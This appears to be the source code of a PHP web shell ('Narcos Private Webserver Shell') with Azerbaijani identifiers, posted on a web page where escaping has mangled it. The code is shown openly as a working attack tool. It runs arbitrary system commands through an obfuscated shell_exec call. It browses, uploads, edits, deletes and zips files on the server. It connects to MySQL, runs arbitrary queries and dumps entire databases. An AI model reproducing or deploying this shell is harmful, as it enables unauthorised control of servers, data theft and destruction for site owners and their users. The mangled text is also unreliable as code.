Go to<\/a> )’;
\n}
\nfunction sizeFormat($bytes)
\n{
\nif($bytes>=1073741824)
\n{
\n$bytes = number_format($bytes \/ 1073741824, 2) . ‘ Gb’;
\n}
\nelse if($bytes>=1048576)
\n{
\n$bytes = number_format($bytes \/ 1048576, 2) . ‘ Mb’;
\n}
\nelse if($bytes>=1024)
\n{
\n$bytes = number_format($bytes \/ 1024, 2) . ‘ Kb’;
\n}
\nelse
\n{
\n$bytes = $bytes . ‘ b’;
\n}
\nreturn $bytes;
\n}
\nfunction utf8ize($d)
\n{
\nif (is_array($d))
\n{
\nforeach ($d as $k => $v)
\n{
\n$d[$k] = utf8ize($v);
\n}
\n}
\nelse if (is_string ($d))
\n{
\nreturn utf8_encode($d);
\n}
\nreturn $d;
\n}
\nfunction rrmdir($dir)
\n{
\nif (is_dir($dir))
\n{
\n$objects = scandir($dir);<\/p>\nforeach ($objects as $object)
\n{
\nif ($object != “.” && $object != “..”)
\n{
\nif (is_dir($dir . “\/” . $object))
\n{
\nrrmdir($dir . “\/” . $object);
\n}
\nelse
\n{
\nunlink($dir . “\/” . $object );
\n}
\n}
\n}<\/p>\n
rmdir( $dir );
\n}
\n}<\/p>\n
$default_dir = getcwd();
\nif(isset($_POST[‘qovluq’]) && is_string($_POST[‘qovluq’]) )
\n{
\n$default_dir = empty($_POST[‘qovluq’]) ? DIRECTORY_SEPARATOR : deshifrele(urldecode(urldecode($_POST[‘qovluq’])));
\n$c_h_dir_comm = ‘c’.’hd’.’ir’;
\n$c_h_dir_comm($default_dir);
\n}<\/p>\n
$default_dir = str_replace(“\\\\”, “\/”, $default_dir);<\/p>\n
if(isset($_GET[‘ne’]) && $_GET[‘ne’]==”pinf”)
\n{
\nob_start();
\nphpinfo();
\n$pInf = ob_get_clean();
\nprint str_replace(“body {background-color: #ffffff; color: #000000;}”,””,$pInf);
\nexit();
\n}
\nelse if($ne==”fayl_yukle” && isset($_POST[‘fayl’]) && “”!=(trim($_POST[‘fayl’])))
\n{
\n$faylAdi = basename(deshifrele(urldecode($_POST[‘fayl’])));
\n$ayirici = substr($default_dir,strlen($default_dir)-1)!=”\/” && substr($faylAdi,0,1)!=”\/” ? “\/” : “”;
\nif(is_file($default_dir . $ayirici . $faylAdi) && is_readable($default_dir . $ayirici . $faylAdi))
\n{
\nheader(“Content-Disposition: attachment; filename=”.basename($faylAdi));
\nheader(“Content-Type: application\/octet-stream”);
\nheader(‘Content-Length: ‘ . filesize($default_dir . $ayirici . $faylAdi));
\nreadfile($default_dir . $ayirici . $faylAdi);
\nexit();
\n}
\n}
\nelse if($ne==”fayl_sil” && isset($_POST[‘fayl’]) && “”!=(trim($_POST[‘fayl’])))
\n{
\n$faylAdi = basename(deshifrele(urldecode($_POST[‘fayl’])));
\n$ayirici = substr($default_dir,strlen($default_dir)-1)!=”\/” && substr($faylAdi,0,1)!=”\/” ? “\/” : “”;
\nif(is_file($default_dir . $ayirici . $faylAdi) && is_readable($default_dir . $ayirici . $faylAdi))
\n{
\nunlink($default_dir . $ayirici . $faylAdi);
\n}
\n}
\nelse if($ne==”fayl_sifirla” && isset($_POST[‘fayl’]) && “”!=(trim($_POST[‘fayl’])))
\n{
\n$faylAdi = basename(deshifrele(urldecode($_POST[‘fayl’])));
\n$ayirici = substr($default_dir,strlen($default_dir)-1)!=”\/” && substr($faylAdi,0,1)!=”\/” ? “\/” : “”;
\nif(is_file($default_dir . $ayirici . $faylAdi) && is_readable($default_dir . $ayirici . $faylAdi))
\n{
\nfile_put_contents($default_dir . $ayirici . $faylAdi, ”);
\n}
\n}
\nelse if($ne==”fayl_yarat” && isset($_POST[‘ad’]) && !empty($_POST[‘ad’]))
\n{
\n$faylAdi = basename(urldecode($_POST[‘ad’]));
\n$ayirici = substr($default_dir,strlen($default_dir)-1)!=”\/” && substr($faylAdi,0,1)!=”\/” ? “\/” : “”;
\nif( is_file($default_dir . $ayirici . $faylAdi) )
\n{
\nprint ‘alert(“The folder with this name already exists!”);’;
\n}
\nelse
\n{
\nfile_put_contents($default_dir . $ayirici . $faylAdi, ”);
\n}
\n}
\nelse if($ne==”papka_yarat” && isset($_POST[‘ad’]) && !empty($_POST[‘ad’]))
\n{
\n$papkaAdi = basename(urldecode($_POST[‘ad’]));
\n$ayirici = substr($default_dir,strlen($default_dir)-1)!=”\/” && substr($papkaAdi,0,1)!=”\/” ? “\/” : “”;
\nif( is_file($default_dir . $ayirici . $papkaAdi) )
\n{
\nprint ‘alert(“The folder with this name already exists!”);’;
\n}
\nelse
\n{
\nmkdir($default_dir . $ayirici . $papkaAdi);
\n}
\n}
\nelse if($ne==”fayl_ad_deyish” && isset($_POST[‘fayl’]) && “”!=(trim($_POST[‘fayl’])) && isset($_POST[‘new_name’]) && is_string($_POST[‘new_name’]) && !empty($_POST[‘new_name’]))
\n{
\n$faylAdi = basename(deshifrele(urldecode($_POST[‘fayl’])));
\n$faylYeniAd = basename(urldecode($_POST[‘new_name’]));
\n$ayirici = substr($default_dir,strlen($default_dir)-1)!=”\/” && substr($faylAdi,0,1)!=”\/” ? “\/” : “”;
\nif(is_file($default_dir . $ayirici . $faylAdi) && is_readable($default_dir . $ayirici . $faylAdi))
\n{
\nrename($default_dir . $ayirici . $faylAdi , $default_dir . $ayirici . $faylYeniAd);
\n}
\n}
\nelse if( $ne == ‘skl_d_t’ && isset($_POST[‘t’]) && is_string($_POST[‘t’]) && !empty($_POST[‘t’]) )
\n{
\n$tableName = deshifrele(urldecode($_POST[‘t’]));<\/p>\n
$host = isset($_COOKIE[‘host’]) ? $_COOKIE[‘host’] : ”;
\n$user = isset($_COOKIE[‘user’]) ? $_COOKIE[‘user’] : ”;
\n$parol = isset($_COOKIE[‘parol’]) ? $_COOKIE[‘parol’] : ”;
\n$baza = isset($_COOKIE[‘baza’]) ? $_COOKIE[‘baza’] : ”;<\/p>\n
$bazaStr = empty($baza) ? ” : ‘dbname=’ . $baza . ‘;’;<\/p>\n
if( !empty( $host ) && !empty($baza) )
\n{
\ntry
\n{
\n$pdo = new PDO(‘mysql:host=’ . $host . ‘;charset=utf8;’ . $bazaStr , $user , $parol,array(PDO::MYSQL_ATTR_INIT_COMMAND => “SET NAMES ‘utf8′”));
\n$pdo->setAttribute(PDO::ATTR_DEFAULT_FETCH_MODE, PDO::FETCH_ASSOC);<\/p>\n
$getColumns = $pdo->prepare(“SELECT column_name from information_schema.columns where table_schema=? and table_name=?”);
\n$getColumns->execute(array($baza , $tableName));
\n$columns = $getColumns->fetchAll();<\/p>\n
if( $columns )
\n{<\/p>\n
$data = $pdo->query(‘SELECT * FROM `’ . $tableName .’`’);
\n$data = $data->fetchAll();<\/p>\n
header(‘Content-disposition: attachment; filename=d_’ . basename(htmlspecialchars($tableName)) . ‘.json’);
\nheader(‘Content-type: application\/json’);
\necho json_encode($data);
\n}
\nelse
\n{
\nprint ‘Table not found!’;
\n}<\/p>\n
}
\ncatch (Exception $e)
\n{
\nprint $e->getMessage();
\n}
\n}
\nelse
\n{
\nprint ‘Error! Please connect to SQL!’;
\n}
\ndie;
\n}
\nelse if( $ne == ‘skl_d’ )
\n{
\n$host = isset($_COOKIE[‘host’]) ? $_COOKIE[‘host’] : ”;
\n$user = isset($_COOKIE[‘user’]) ? $_COOKIE[‘user’] : ”;
\n$parol = isset($_COOKIE[‘parol’]) ? $_COOKIE[‘parol’] : ”;
\n$baza = isset($_COOKIE[‘baza’]) ? $_COOKIE[‘baza’] : ”;<\/p>\n
$bazaStr = empty($baza) ? ” : ‘dbname=’ . $baza . ‘;’;<\/p>\n
if( !empty( $host ) && !empty($baza) )
\n{
\ntry
\n{
\n$pdo = new PDO(‘mysql:host=’ . $host . ‘;charset=utf8;’ . $bazaStr , $user , $parol,array(PDO::MYSQL_ATTR_INIT_COMMAND => “SET NAMES ‘utf8′”));
\n$pdo->setAttribute(PDO::ATTR_DEFAULT_FETCH_MODE, PDO::FETCH_ASSOC);<\/p>\n
$allData = array();<\/p>\n
$tables = $pdo->prepare(‘SELECT table_name from information_schema.tables where table_schema=?’);
\n$tables->execute(array($baza));
\n$tables = $tables->fetchAll();<\/p>\n
foreach( $tables AS $tableName )
\n{
\n$tableName = $tableName[‘table_name’];<\/p>\n
$data = $pdo->query(‘SELECT * FROM `’ . $tableName .’`’);
\n$data = $data->fetchAll();<\/p>\n
$allData[$tableName] = $data ? array($data) : array();
\n}<\/p>\n
header(‘Content-disposition: attachment; filename=d_b_’ . basename(htmlspecialchars($baza)) . ‘.json’);
\nheader(‘Content-type: application\/json’);<\/p>\n
echo json_encode( utf8ize( $allData) );
\n}
\ncatch (Exception $e)
\n{
\nprint $e->getMessage();
\n}
\n}
\nelse
\n{
\nprint ‘Error! Please connect to SQL!’;
\n}
\ndie;
\n}
\nelse if( $ne == ‘ziple’
\n&& isset($_POST[‘save_to’] , $_POST[‘zf’]) && is_string($_POST[‘save_to’])
\n&& !empty($_POST[‘save_to’]) && !in_array($_POST[‘save_to’] , array(‘.’ , ‘..’ , ‘.\/’ , ‘..\/’))
\n&& is_string($_POST[‘zf’]) && !empty($_POST[‘zf’])
\n)
\n{
\n$save_to = deshifrele(urldecode($_POST[‘save_to’]));<\/p>\n
$rootPath = realpath(deshifrele(urldecode($_POST[‘zf’])));<\/p>\n
$fileName1 = ‘bak_’.microtime(1) . ‘_’ . rand(1000, 99999) . ‘.zip’;
\n$fileName = $save_to . DIRECTORY_SEPARATOR . $fileName1;<\/p>\n
if( is_dir( $save_to ) && is_dir( $rootPath ) && is_writable( $save_to ) )
\n{
\nset_time_limit(0);<\/p>\n
$zip = new ZipArchive();
\n$zip->open( $fileName , ZipArchive::CREATE | ZipArchive::OVERWRITE );<\/p>\n
$files = new RecursiveIteratorIterator(
\nnew RecursiveDirectoryIterator($rootPath),
\nRecursiveIteratorIterator::LEAVES_ONLY
\n);<\/p>\n
foreach ($files as $name => $file)
\n{
\nif (!$file->isDir())
\n{
\n$filePath = $file->getRealPath();
\n$relativePath = substr($filePath, strlen($rootPath) + 1);<\/p>\n
$zip->addFile($filePath, $relativePath);
\n}
\n}<\/p>\n
$zip->close();
\nprint ‘Saved!<\/p>\n
\n‘;
\n}
\nelse
\n{
\nprint ‘Dir is not writeable!<\/p>\n
\n‘;var_dump(( $save_to ) );
\n}
\n}
\nelse if( $ne == ‘papka_sil’
\n&& isset($_POST[‘zf’]) && is_string($_POST[‘zf’]) && !empty($_POST[‘zf’])
\n)
\n{
\n$rootPath = realpath(deshifrele(urldecode($_POST[‘zf’])));<\/p>\n
if( is_dir( $rootPath ) )
\n{
\nset_time_limit(0);<\/p>\n
rrmdir( $rootPath );
\n}
\nelse
\n{
\nprint ‘Dir is not writeable!<\/p>\n
\n‘;var_dump(( $save_to ) );
\n}
\n}
\nelse if($ne == ‘fayl_upl’ && isset($_FILES[‘ufayl’]))
\n{
\nmove_uploaded_file($_FILES[‘ufayl’][‘tmp_name’], $default_dir . ‘\/’ . $_FILES[‘ufayl’][‘name’]);
\nprint “It looks loaded.”;
\n}
\n?><\/p>\n
Narcos Private Webserver Shell<\/title><\/p>\n<p>body<br \/>\n{<br \/>\n background-color: #222222;<br \/>\n color: #D6D4D4;<br \/>\n font-family: Lucida,Verdana;<br \/>\n font-size: 12px;<br \/>\n}<br \/>\n.qalin<br \/>\n{<br \/>\n text-decoration: none;<br \/>\n color: #D6905E;<br \/>\n font-weight: 600;<br \/>\n}<br \/>\n.success<br \/>\n{<br \/>\n color: #9DB754;<br \/>\n}<br \/>\n.bad<br \/>\n{<br \/>\n color: #B75654;<br \/>\n}<br \/>\na<br \/>\n{<br \/>\n color: #ACB754;<br \/>\n text-decoration: none !important;<br \/>\n}<br \/>\n.fManager,.fManager tbody,.fManager tr<br \/>\n{<br \/>\n padding: 0;<br \/>\n border-collapse: collapse;<br \/>\n margin: 0;<br \/>\n font-size: 12px;<br \/>\n}<br \/>\n.fManager<br \/>\n{<br \/>\n margin: 10px 0;<br \/>\n}<br \/>\n.fManager tbody tr:nth-child(2n+1)<br \/>\n{<br \/>\n background: #331717;<br \/>\n}<br \/>\n.fManager tbody tr:nth-child(2n)<br \/>\n{<br \/>\n background: #1C0C0C;<br \/>\n}<br \/>\n.fManager tbody tr:hover<br \/>\n{<br \/>\n background: #000000;<br \/>\n}<br \/>\n.fManager thead th<br \/>\n{<br \/>\n text-align: left;<br \/>\n}<br \/>\n.fManager thead tr<br \/>\n{<br \/>\n background-color: #333333;<br \/>\n}<br \/>\n.fManager<br \/>\n{<br \/>\n box-shadow: 1px 1px 1px 1px #333333;<br \/>\n}<br \/>\n.fManager thead th<br \/>\n{<br \/>\n padding: 4px 3px;<br \/>\n}<br \/>\n.fayl_oxu<br \/>\n{<br \/>\n margin: 5px 0;<br \/>\n padding: 2px;<br \/>\n box-shadow: 1px 1px 1px 1px #333333;<br \/>\n background-color: #E1E1E1;<br \/>\n width: 100%;<br \/>\n height: 400px;<br \/>\n overflow: auto;<br \/>\n}<br \/>\n.btn<br \/>\n{<br \/>\n border: 1px solid #ACAE40;<br \/>\n background-color: #223B3B;<br \/>\n color: #E1E1E1;<br \/>\n padding: 1px 10px;<br \/>\n cursor: pointer;<br \/>\n}<br \/>\n.btn:disabled<br \/>\n{<br \/>\n border: 1px solid #848484;<br \/>\n color: #848484;<br \/>\n cursor: not-allowed;<br \/>\n}<br \/>\n.file_edit<br \/>\n{<br \/>\n margin: 5px 0;<br \/>\n padding: 2px;<br \/>\n box-shadow: 1px 1px 1px 1px #333333;<br \/>\n background-color: #E1E1E1;<br \/>\n width: 100%;<br \/>\n height: 400px;<br \/>\n overflow: auto;<br \/>\n}<br \/>\ninput, select, textarea<br \/>\n{<br \/>\n background: transparent !important;<br \/>\n color: #f6a56d;<br \/>\n border: 1px solid #D6905E;<br \/>\n padding: 5px;<br \/>\n}<br \/>\ntable td<br \/>\n{<br \/>\n border: 1px solid rgba(214, 144, 94, 0.7);<br \/>\n min-width: 20px;<br \/>\n padding-left: 5px;<br \/>\n padding-right: 5px;<br \/>\n max-width: 500px;<br \/>\n color: #ffad6f;<br \/>\n background: #292929;<br \/>\n}<br \/>\ntable th<br \/>\n{<br \/>\n border: 1px solid #D6905E;<br \/>\n padding-left: 5px;<br \/>\n padding-right: 5px;<br \/>\n color: #ffad6f;<br \/>\n}<br \/>\ntable td div<br \/>\n{<br \/>\n overflow: auto;<br \/>\n width: 100%;<br \/>\n height: 100%;<br \/>\n max-height: 100px;<br \/>\n}<\/p>\n<p><?php<\/p>\n<p>if(function_exists('posix_getegid'))<br \/>\n{<br \/>\n $qid = posix_getgrgid(posix_getegid());<br \/>\n $qrup = $qid['name'];<br \/>\n print "<span class='qalin'>Uname:<\/span> ” . php_uname() . ”<br \/>\n“;<br \/>\nprint “<span class='qalin'>User:<\/span> “.getmyuid().” (“.get_current_user().”)<br \/>\n“;<br \/>\nprint “<span class='qalin'>Group:<\/span> “.getmygid().” (“.$qrup.”)<br \/>\n“;<br \/>\n}<br \/>\nelse<br \/>\n{<br \/>\nprint “<span class='qalin'>Uname:<\/span> ” . php_uname() . ”<br \/>\n“;<br \/>\nprint “<span class='qalin'>User:<\/span> “.getmyuid().” (“.get_current_user().”)<br \/>\n“;<br \/>\nprint “<span class='qalin'>Group:<\/span> “.getmygid().”<br \/>\n“;<br \/>\n}<br \/>\nprint “<span class='qalin'>Disable functions:<\/span> ” . (implode(“, “, $baqliFunksiyalar)==””?”<span class='success'>No”:”<span class='bad'>“. implode(“, “, $baqliFunksiyalar)) . “<\/span><br \/>\n“;<br \/>\nprint “<span class='qalin'>Safe mode: <\/span>” . ($safeMode===true?”<span class='bad'>On”:”<span class='success'>Off”) . “<\/span><span style='margin-left: 50px'><a href='sehife(\"?ne=phpinfo\")'>[ PHPinfo ]<\/a><\/span><br \/>\n“;<br \/>\nqovluquYaz();<br \/>\nprint ‘<\/p>\n<hr>\n<p>‘;<br \/>\nif($ne==”phpinfo”)<br \/>\n{<br \/>\nprint ”<\/p>\n<div style='width: 100%;height: 400px'><\/div>\n<p>“;<br \/>\n}<br \/>\nelse if($ne==”sistem_kom”)<br \/>\n{<br \/>\nif( isset( $_POST[‘kom’] ) && is_string($_POST[‘kom’]) && !empty($_POST[‘kom’]) )<br \/>\n{<br \/>\n$komanda = deshifrele(urldecode($_POST[‘kom’]));<\/p>\n<p>$k = ‘sh’;<br \/>\n$k.=’el’;<br \/>\n$k.=’l_e’;<br \/>\n$k.=’xe’;<br \/>\n$k.=’c’;<\/p>\n<p>$output = $k($komanda);<\/p>\n<p>print ‘<\/p>\n<pre style=\"max-height: 350px;overflow: auto;border: 1px solid #777;padding: 5px\">' . htmlspecialchars($output) . '<\/pre>\n<hr>\n<p>‘;<br \/>\n}<br \/>\nprint ‘ <button type=\"button\" class=\"btn\">Okey<\/button>‘;<br \/>\n}<br \/>\nelse if($ne==”fayl_oxu” && isset($_POST[‘fayl’]) && “”!=(trim($_POST[‘fayl’])))<br \/>\n{<br \/>\n$faylAdi = basename(deshifrele(urldecode($_POST[‘fayl’])));<br \/>\n$ayirici = substr($default_dir,strlen($default_dir)-1)!=”\/” && substr($faylAdi,0,1)!=”\/” ? “\/” : “”;<br \/>\nif(is_file($default_dir . $ayirici . $faylAdi) && is_readable($default_dir . $ayirici . $faylAdi))<br \/>\n{<br \/>\n$elaveBtn = is_writeable($default_dir . $ayirici . $faylAdi) ? ” onclick=’sehife(\\”?ne=fayl_redakte&fayl=”.urlencode(urlencode(shifrele($faylAdi))).”&qovluq=”.urlencode(urlencode(shifrele($default_dir))).”\\”)'” : ” disabled”;<br \/>\nprint ”<\/p>\n<div>File Name: <span class='qalin'>“.htmlspecialchars($faylAdi).”<\/span><br \/>\n<button> Change <\/button><\/div>\n<p>“;<br \/>\nprint ”<\/p>\n<div class='fayl_oxu'>“.highlight_string(file_get_contents($default_dir . $ayirici . $faylAdi), true).”<\/div>\n<p>“;<br \/>\n}<br \/>\n}<br \/>\nelse if($ne == ‘skl’)<br \/>\n{<br \/>\n$host = isset($_COOKIE[‘host’]) ? $_COOKIE[‘host’] : ”;<br \/>\n$user = isset($_COOKIE[‘user’]) ? $_COOKIE[‘user’] : ”;<br \/>\n$parol = isset($_COOKIE[‘parol’]) ? $_COOKIE[‘parol’] : ”;<br \/>\n$baza = isset($_COOKIE[‘baza’]) ? $_COOKIE[‘baza’] : ”;<\/p>\n<p>if( isset($_POST[‘host’] , $_POST[‘user’] , $_POST[‘parol’])<br \/>\n&& is_string($_POST[‘host’]) && is_string($_POST[‘user’]) && is_string($_POST[‘parol’])<br \/>\n)<br \/>\n{<br \/>\n$host = $_POST[‘host’];<br \/>\n$user = $_POST[‘user’];<br \/>\n$parol = $_POST[‘parol’];<br \/>\n$baza = ”;<\/p>\n<p>setcookie(‘host’ , $host , time() + 360000);<br \/>\nsetcookie(‘user’ , $user , time() + 360000);<br \/>\nsetcookie(‘parol’ , $parol , time() + 360000);<br \/>\nsetcookie(‘baza’ , $baza , time() + 360000);<br \/>\n}<\/p>\n<p>if( isset($_POST[‘baza’]) && is_string($_POST[‘baza’]) )<br \/>\n{<br \/>\n$baza = $_POST[‘baza’];<\/p>\n<p>setcookie(‘baza’ , $baza , time() + 360000);<br \/>\n}<\/p>\n<p>$bazaStr = empty($baza) ? ” : ‘dbname=’ . $baza . ‘;’;<\/p>\n<p>?><\/p>\n<p><input type="text" placeholder="Hostname" name="host" value="”><br \/>\n<input type="text" placeholder="User" name="user" value="”><br \/>\n<input type="text" placeholder="Parol" name="parol" value="”><\/p>\n<p> “SET NAMES ‘utf8′”));<br \/>\n$pdo->setAttribute(PDO::ATTR_DEFAULT_FETCH_MODE, PDO::FETCH_ASSOC);<\/p>\n<p>$schematas = $pdo->query(‘SELECT schema_name FROM information_schema.schemata’);<br \/>\nprint ‘<\/p>\n<p>‘;<br \/>\nforeach($schematas->fetchAll() AS $schemaName)<br \/>\n{<br \/>\nprint ‘<br \/>\n‘.htmlspecialchars($schemaName[‘schema_name’]).”;<br \/>\n}<br \/>\nprint ‘<br \/>\n ‘;<\/p>\n<p>if( !empty($baza) )<br \/>\n{<br \/>\n$tables = $pdo->prepare(‘SELECT table_name from information_schema.tables where table_schema=?’);<br \/>\n$tables->execute(array($baza));<br \/>\n$tables = $tables->fetchAll();<\/p>\n<p>print ‘<\/p>\n<div>‘;<br \/>\nprint ‘<a href=\"sehife(\\'?ne=skl_d\\');\">!! Dump DB !!<\/a><\/p>\n<hr>\n<p>‘;<br \/>\nforeach( $tables AS $tableName )<br \/>\n{<br \/>\n$tableName = $tableName[‘table_name’];<br \/>\nprint ‘<a href=\"sehife(\\'?ne=skl&t=' . urlencode(urlencode(shifrele($tableName))) . '\\')\">‘.htmlspecialchars($tableName).’<\/a><br \/>\n‘;<br \/>\n}<br \/>\nprint ‘<\/div>\n<p>‘;<br \/>\nprint ‘<\/p>\n<div style=\"float: left;padding-left: 10px;width: 75%\">‘;<\/p>\n<p>if( isset($_POST[‘t’]) && is_string($_POST[‘t’]) && !empty($_POST[‘t’]) )<br \/>\n{<br \/>\n$tableName = deshifrele(urldecode($_POST[‘t’]));<br \/>\nprint ‘<span class=\"qalin\">Table:<\/span> ‘ . htmlspecialchars($tableName) . ‘ ( <a href=\"sehife(\\'?ne=skl_d_t&t='.urlencode(urlencode(shifrele($tableName))).'\\')\">Dump<\/a> )<br \/>\n‘;<\/p>\n<p>$getColumns = $pdo->prepare(“SELECT column_name from information_schema.columns where table_schema=? and table_name=?”);<br \/>\n$getColumns->execute(array($baza , $tableName));<br \/>\n$columns = $getColumns->fetchAll();<\/p>\n<p>if( $columns )<br \/>\n{<br \/>\n$dataCount = $pdo->query(‘SELECT count(0) AS ss from `’ . $tableName . ‘`’);<br \/>\n$dataCount = (int)$dataCount->fetchColumn();<\/p>\n<p>print ‘<span class=\"qalin\">Count:<\/span> ‘ . $dataCount . ‘<\/p>\n<p>‘;<\/p>\n<p>$pages = ceil($dataCount \/ 100);<\/p>\n<p>$currentPage = isset($_POST[‘sehife’]) && is_numeric($_POST[‘sehife’]) && $_POST[‘sehife’] >= 1 && $_POST[‘sehife’] <= $pages ? (int)$_POST['sehife'] : 1;<\/p>\n<p> for ( $p = 1; $p <= $pages; $p++ )<br \/>\n {<br \/>\n print '<a style=\"margin-bottom: 5px;padding: 2px 6px;border: 1px solid #ACB754;text-decoration: none\" href=\"sehife(\\'?ne=skl&t=' . urlencode(urlencode(shifrele($tableName))) . '&sehife=' . $p . '\\');\">‘ . $p . ‘<\/a> ‘;<br \/>\n}<br \/>\nprint ‘<\/p>\n<p>‘;<\/p>\n<p>$start = 100 * ($currentPage – 1);<\/p>\n<p>$data = $pdo->query(‘SELECT * FROM `’ . $tableName .’` LIMIT ‘.$start.’ , 100′);<br \/>\n$data = $data->fetchAll();<br \/>\nprint ‘<\/p>\n<table>\n<thead>‘;<\/p>\n<p>foreach( $columns AS $columnInf )<br \/>\n{<br \/>\nprint ‘<\/p>\n<th>‘ . htmlspecialchars($columnInf[‘column_name’]) . ‘<\/th>\n<p>‘;<br \/>\n}<\/p>\n<p>print ‘<\/thead>\n<tbody>‘;<\/p>\n<p>foreach( $data AS $row )<br \/>\n{<br \/>\nprint ‘<\/p>\n<tr>‘;<br \/>\nforeach( $row AS $key=>$val )<br \/>\n{<br \/>\nprint ‘<\/p>\n<td>\n<div>‘ . $val . ‘<\/div>\n<\/td>\n<p>‘;<br \/>\n}<br \/>\nprint ‘<\/tr>\n<p>‘;<br \/>\n}<br \/>\nprint ‘<\/tr>\n<\/tbody>\n<\/table>\n<p>‘;<br \/>\n}<br \/>\nelse<br \/>\n{<br \/>\nprint ‘Table not found!’;<br \/>\n}<br \/>\n}<br \/>\nelse if ( isset($_POST[’emr’]) && is_string($_POST[’emr’]) && !empty($_POST[’emr’]) )<br \/>\n{<br \/>\n$emr = deshifrele(urldecode($_POST[’emr’]));<br \/>\nprint ‘<span class=\"qalin\">SQL emr:<\/span> ‘ . htmlspecialchars($emr) . ‘<br \/>\n‘;<\/p>\n<p>$data = $pdo->query( $emr );<br \/>\n$data = $data->fetchAll();<\/p>\n<p>print ‘<\/p>\n<table>\n<thead>‘;<br \/>\nif( count($data) > 0 )<br \/>\n{<br \/>\nprint ‘<\/p>\n<tr>‘;<br \/>\nforeach( $data[0] AS $key=>$val )<br \/>\n{<br \/>\nprint ‘<\/p>\n<th>\n<div>‘ . $key . ‘<\/div>\n<\/th>\n<p>‘;<br \/>\n}<br \/>\nprint ‘<\/tr>\n<p>‘;<br \/>\n}<br \/>\nprint ‘<\/thead>\n<tbody>‘;<\/p>\n<p>foreach( $data AS $row )<br \/>\n{<br \/>\nprint ‘<\/p>\n<tr>‘;<br \/>\nforeach( $row AS $key=>$val )<br \/>\n{<br \/>\nprint ‘<\/p>\n<td>\n<div>‘ . $val . ‘<\/div>\n<\/td>\n<p>‘;<br \/>\n}<br \/>\nprint ‘<\/tr>\n<p>‘;<br \/>\n}<br \/>\nprint ‘<\/tr>\n<\/tbody>\n<\/table>\n<p>‘;<br \/>\n}<\/p>\n<p>print ‘<\/p>\n<div><textarea id=\"skl_emr\"><\/textarea><button type=\"button\">Click Me!<\/button><\/div>\n<p>‘;<\/p>\n<p>print ‘<\/p>\n<\/div>\n<p>‘;<br \/>\nprint ‘<\/p>\n<div style=\"clear: both\"><\/div>\n<p>‘;<br \/>\n}<br \/>\n}<br \/>\ncatch (Exception $e)<br \/>\n{<br \/>\nprint $e->getMessage();<br \/>\n}<br \/>\n}<br \/>\n}<br \/>\nelse if($ne==”fayl_redakte” && isset($_POST[‘fayl’]) && “”!=(trim($_POST[‘fayl’])))<br \/>\n{<br \/>\n$faylAdi = basename(deshifrele(urldecode(urldecode($_POST[‘fayl’]))));<br \/>\n$ayirici = substr($default_dir,strlen($default_dir)-1)!=”\/” && substr($faylAdi,0,1)!=”\/” ? “\/” : “”;<br \/>\nif(is_file($default_dir . $ayirici . $faylAdi) && is_readable($default_dir . $ayirici . $faylAdi))<br \/>\n{<br \/>\n$status = “”;<br \/>\nif(isset($_POST[‘content’]) && isset($_POST[‘took’]) && $_POST[‘took’]!=”” && isset($_SESSION[‘ys_took’]) && $_SESSION[‘ys_took’]==$_POST[‘took’] && is_writeable($default_dir . $ayirici . $faylAdi))<br \/>\n{<br \/>\nunset($_SESSION[‘ys_took’]);<br \/>\n$content = $_POST[‘content’];<\/p>\n<p>$cc = array(‘a’,’i’,’e’,’s’,’l’,’b’,’u’,’o’,’p’,’h’,”(“,”)”,””,”?”,”;”,”[“,”]”,”$”);<br \/>\nforeach($cc AS $k1=>$v1)<br \/>\n{<br \/>\n$content = str_replace(‘|:’.$k1.’:|’ , $v1 , $content);<br \/>\n}<\/p>\n<p>$faylAch = fopen($default_dir . $ayirici . $faylAdi, “w+”);<br \/>\nfwrite($faylAch, $content);<br \/>\nfclose($faylAch);<br \/>\n$status = ” <span class='qalin'>Saved!<\/span>“;<br \/>\n}<br \/>\n$oxuUrl = “?ne=fayl_oxu&fayl=”.urlencode(urlencode(shifrele($faylAdi))).”&qovluq=”.urlencode(urlencode(shifrele($default_dir)));<br \/>\n$elaveBtn = is_writeable($default_dir . $ayirici . $faylAdi) ? “” : ” disabled”;<br \/>\nprint ”<\/p>\n<div>File Name <a class='qalin' href='sehife(\"{$oxuUrl}\")'>“.htmlspecialchars($faylAdi).”<\/a><\/p>\n<p><button type='submit'> Don’t forget <\/button> <button type='button'> These codes <\/button> $status<\/div>\n<p>“;<br \/>\nprint “<textarea name='content' class='file_edit'>“.htmlspecialchars(file_get_contents($default_dir . $ayirici . $faylAdi)).”<\/textarea>“;<br \/>\n}<br \/>\nelse<br \/>\n{<br \/>\nprint ‘Error! ‘ . htmlspecialchars($default_dir . $ayirici . $faylAdi);<br \/>\n}<br \/>\n}<br \/>\nelse<br \/>\n{<br \/>\nif(is_dir($default_dir))<br \/>\n{<br \/>\nif(is_readable($default_dir))<br \/>\n{<br \/>\n$qovluqIchi = scandir($default_dir);<br \/>\nforeach($qovluqIchi AS &$emelemnt)<br \/>\n{<br \/>\n$ayirici = substr($default_dir,strlen($default_dir)-1)!=”\/” && substr($emelemnt,0,1)!=”\/” ? “\/” : “”;<br \/>\nif(is_dir($default_dir . $ayirici . $emelemnt))<br \/>\n{<br \/>\n$emelemnt = “0”.$emelemnt;<br \/>\n}<br \/>\nelse<br \/>\n{<br \/>\n$emelemnt = “1”.$emelemnt;<br \/>\n}<br \/>\n}<br \/>\nasort($qovluqIchi);<br \/>\nprint ”<\/p>\n<table class='fManager' style='width: 100%'>\n<thead>\n<tr class='qalin'>\n<th>A<\/th>\n<th>File<\/th>\n<th>Size<\/th>\n<th>History<\/th>\n<th>Owner\/Group<\/th>\n<th>Permissions<\/th>\n<th>Actions<\/th>\n<\/tr>\n<\/thead>\n<tbody>“;<br \/>\nforeach($qovluqIchi AS $element)<br \/>\n{<br \/>\n$url = “”;<br \/>\n$element = substr($element,1);<br \/>\n$faylAdiTam = $default_dir . $ayirici . $element;<br \/>\n$ayirici = substr($default_dir,strlen($default_dir)-1)!=”\/” && substr($element,0,1)!=”\/” ? “\/” : “”;<br \/>\n$adi = is_dir($faylAdiTam) ? “[ $element ]” : $element;<br \/>\n$classN = “”;<br \/>\nif(is_dir($faylAdiTam))<br \/>\n{<br \/>\nif($element==”.”)<br \/>\n{<br \/>\n$url = “?qovluq=”.urlencode(urlencode(shifrele($default_dir)));<br \/>\n}<br \/>\nelse if($element==”..”)<br \/>\n{<br \/>\n$yeniUrl = explode(“\/”,$default_dir);<br \/>\nforeach(array_reverse($yeniUrl) AS $j=>$qq)<br \/>\n{<br \/>\nif(trim($qq)!=””)<br \/>\n{<br \/>\nunset($yeniUrl[count($yeniUrl)-$j-1]);<br 